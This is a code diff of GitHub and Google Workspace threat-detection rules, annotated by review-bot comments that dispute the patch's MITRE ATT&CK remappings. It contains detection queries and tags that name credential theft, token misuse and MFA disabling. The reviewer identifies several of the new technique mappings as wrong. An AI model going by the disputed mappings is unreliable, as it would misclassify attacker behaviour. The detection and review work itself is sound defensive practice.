@@ -54,7 +54,14 @@ references = [ risk_score = 21 rule_id = "214d4e03-90b0-4813-9ab6-672b47158590" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -66,16 +73,29 @@ github.category == "personal_access_token" and event.action == "personal_access_ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1136" +name = "Create Account" +reference = "https://attack.mitre.org/techniques/T1136/" [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/github/persistence_organization_owner_role_granted.toml b/rules/integrations/github/persistence_organization_owner_role_granted.toml index b32268406c6..c8b2b1f0fc5 100644 --- a/rules/integrations/github/persistence_organization_owner_role_granted.toml +++ b/rules/integrations/github/persistence_organization_owner_role_granted.toml 
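Review bot: Both techniques introduced in this hunk describe a different event from the one the query matches (`github.category == "personal_access_token"` with a create action): T1136.003 is the creation of a cloud account, and T1528 Steal Application Access Token is theft of an existing OAuth/app token, whereas minting a PAT adds a credential to an account that already exists, which is exactly the removed T1098.001 Additional Cloud Credentials. I would restore T1098/T1098.001 under Persistence and drop the Credential Access block along with the `"Tactic: Credential Access"` tag added in the previous hunk; if a Credential Access mapping is wanted it needs a technique whose description covers self-issued tokens, and T1528 is not it.
```toml
[[rule.threat.technique]]
id = "T1098"
name = "Account Manipulation"
reference = "https://attack.mitre.org/techniques/T1098/"

[[rule.threat.technique.subtechnique]]
id = "T1098.001"
name = "Additional Cloud Credentials"
reference = "https://attack.mitre.org/techniques/T1098/001/"

# … unchanged: [rule.threat.tactic] Persistence (TA0003) …
```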
@@ -2,7 +2,7 @@ creation_date = "2023/09/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -52,7 +52,14 @@ In GitHub organizations, the owner role grants comprehensive administrative priv risk_score = 47 rule_id = "9b343b62-d173-4cfd-bd8b-e6379f964ca4" severity = "medium" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Use Case: UEBA", + "Tactic: Persistence", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -63,36 +70,19 @@ iam where event.dataset == "github.audit" and event.action == "org.update_member [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
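Review bot: Deleting the second `[[rule.threat]]` block in this hunk removes the Privilege Escalation mapping from a rule that fires on `org.update_member` elevating a member to owner, which is the escalation case of T1098.003; ATT&CK lists Additional Cloud Roles under both Persistence and Privilege Escalation, so the two entries were not redundant, they were the same technique under two legitimate tactics. If the goal is one tactic per technique, that is a defensible de-duplication, but it should be stated in the commit message rather than arrive as a side effect of the tag cleanup in the earlier hunk. Otherwise re-add the deleted TA0004 block as it was and put `"Tactic: Privilege Escalation"` back in the tags.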
diff --git a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml index 05da7b7543b..8b50df9d34a 100644 --- a/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml +++ b/rules/integrations/google_workspace/collection_google_drive_ownership_transferred_via_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/24" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -84,7 +84,12 @@ references = [ risk_score = 47 rule_id = "07b5f85a-240f-11ed-b3d9-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Exfiltration", "Data Source: Google Workspace", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -96,13 +101,19 @@ event.dataset:"google_workspace.admin" and event.action:"CREATE_DATA_TRANSFER_RE [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1074" +name = "Data Staged" +reference = "https://attack.mitre.org/techniques/T1074/" +[[rule.threat.technique.subtechnique]] +id = "T1074.002" +name = "Remote Data Staging" +reference = "https://attack.mitre.org/techniques/T1074/002/" + + [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + 
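Review bot: The technique chosen in the last hunk, T1074.002 Remote Data Staging, does not describe `CREATE_DATA_TRANSFER_RE…` (hunk header context): a Drive ownership transfer hands the files to another account, which is what the removed T1537 Transfer Data to Cloud Account covers, while T1074 is about aggregating data at a staging location ahead of exfiltration. The Collection tactic appears to have been picked to match the `collection_` file-name prefix rather than the behaviour. I would keep `id = "T1537"` / `name = "Transfer Data to Cloud Account"` under TA0010 Exfiltration and the `"Tactic: Exfiltration"` tag removed in the tags hunk, renaming the file if the prefix is the concern; the trailing empty `+` line at end of file should also go.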
diff --git a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml index cb72f43152f..36138972133 100644 --- a/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml +++ b/rules/integrations/google_workspace/credential_access_google_workspace_drive_encryption_key_accessed_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -80,7 +80,13 @@ references = [ risk_score = 73 rule_id = "980b70a0-c820-11ed-8799-f661ea17fbcc" severity = "high" -tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -96,31 +102,19 @@ file where event.dataset == "google_workspace.drive" and event.action : ("copy", [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml index 664b19c5d94..ba8f4a4f7f8 100644 --- a/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml +++ b/rules/integrations/google_workspace/defense_evasion_application_removed_from_blocklist_in_google_workspace.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] 
@@ -107,13 +107,19 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.type:" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml index fec6ad8c4e3..50b9fd776ed 100644 --- a/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml +++ b/rules/integrations/google_workspace/defense_evasion_domain_added_to_google_workspace_trusted_domains.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] 
@@ -99,13 +99,19 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index a0a8211ec53..09ecde61c16 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml +++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] 
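Review bot: T1562.007 Disable or Modify Cloud Firewall, added in this hunk, is the wrong sub-technique for adding a domain to the Workspace trusted-domains list: that list is a sharing/collaboration policy, and T1562.007 is specifically about cloud network firewall and security-group rules, so anyone pivoting from ATT&CK coverage will be misled. The removed T1484 Domain or Tenant Policy Modification described a tenant-level policy change accurately, and its T1484.002 Trust Modification sub-technique is the nearest match if a sub-technique is wanted. Suggest restoring `id = "T1484"`, `name = "Domain or Tenant Policy Modification"`, `reference = "https://attack.mitre.org/techniques/T1484/"`, optionally with the T1484.002 subtechnique beneath it.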
@@ -108,13 +108,19 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 04e49aa2abd..5c62a0f8be1 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -84,7 +84,13 @@ references = [ risk_score = 47 rule_id = "cad4500a-abd7-4ef3-b5d3-95524de7cfe1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Impact", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -97,36 +103,14 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 39173e2ad0e..9da5f09028e 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] 
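Review bot: T1531 Account Access Removal, introduced in this hunk, is a mis-mapping: that technique is about locking legitimate users out (deleting accounts, resetting passwords), whereas disabling MFA enforcement removes no one's access; it weakens authentication, which is precisely what the deleted T1556.006 Modify Authentication Process: Multi-Factor Authentication covers. The sibling 2SV rule in this patch keeps T1556, so this file now disagrees with it for the same class of event. Restore T1556/T1556.006 under one of its ATT&CK tactics and change the `"Tactic: Impact"` tag from the previous hunk to match; if a single tactic is wanted, Defense Evasion is the natural choice for an enforcement policy being switched off.
```toml
# … unchanged: [[rule.threat]] / framework = "MITRE ATT&CK" …
[[rule.threat.technique]]
id = "T1556"
name = "Modify Authentication Process"
reference = "https://attack.mitre.org/techniques/T1556/"

[[rule.threat.technique.subtechnique]]
id = "T1556.006"
name = "Multi-Factor Authentication"
reference = "https://attack.mitre.org/techniques/T1556/006/"

[rule.threat.tactic]
id = "TA0005"
name = "Defense Evasion"
reference = "https://attack.mitre.org/tactics/TA0005/"
```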
@@ -86,7 +86,13 @@ references = [ risk_score = 47 rule_id = "38f384e0-aef8-11ed-9a38-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -98,13 +104,19 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index 4c6bd7ab17f..e3a60da3cd3 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
@@ -77,7 +77,13 @@ references = [ risk_score = 21 rule_id = "00678712-b2df-11ed-afe9-f661ea17fbcc" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -88,23 +94,19 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 7f270de664b..46a1d328e83 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/19" [rule] author = ["Elastic"] 
@@ -89,7 +89,12 @@ references = [ risk_score = 47 rule_id = "f33e68a4-bd19-11ed-b02f-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: Google Workspace", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -111,31 +116,19 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.001" -name = "Malicious Link" -reference = "https://attack.mitre.org/techniques/T1204/001/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 3433348477a..90cf5ef9b6e 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -104,12 +104,8 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 9dc67a9a58a..4647fb4aed4 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -86,7 +86,13 @@ references = [ risk_score = 47 rule_id = "5e161522-2545-11ed-ac47-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Configuration Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
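Review bot: After the second hunk of the application-added rule, its Persistence `[[rule.threat]]` has a tactic but no `[[rule.threat.technique]]` at all: the T1098 block is deleted and nothing replaces it. A tactic-only entry may be schema-valid if technique is optional, but the rule then contributes to no technique coverage, and the deletion reads as a leftover of the de-duplication pass rather than a decision. If no ATT&CK technique fits an application being authorized on the domain, note that in the PR description; otherwise re-add T1098 (or whichever technique is judged closest) directly below `framework = "MITRE ATT&CK"`.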
@@ -97,36 +103,14 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index 1439fc968b1..a23661911b2 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] 
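Review bot: The retained Persistence entry in hunk `@@ -97,36 +103,14 @@` loses its `[[rule.threat.technique.subtechnique]]` table for T1556.006 (Multi-Factor Authentication), even though the query is `event.action:"2sv_disable"`, which is exactly the MFA-modification case the subtechnique describes. Dropping the Defense Evasion duplicate is fine, but the subtechnique should stay under T1556 in the surviving entry, i.e. restore the subtechnique table with `id = "T1556.006"` below the T1556 technique. The mfa_disabled_for_google_workspace_organization hunk `@@ -94,36 +100,14 @@` has the same omission.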
@@ -89,7 +89,13 @@ references = [ risk_score = 73 rule_id = "68994a6c-c7ba-4e82-b476-26a26877adf6" severity = "high" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -101,36 +107,19 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 5342d9390fe..643c9d27e06 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/09/23" [rule] author = ["Elastic"] @@ -87,7 +87,13 @@ references = [ risk_score = 47 rule_id = "ad3f2807-2b3e-47d7-b282-f84acbbe14be" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Google Workspace", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Persistence", +] timestamp_override = "event.ingested" type = "query" @@ -98,36 +104,14 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index c7acf7764c1..986aac4bd3d 100644 
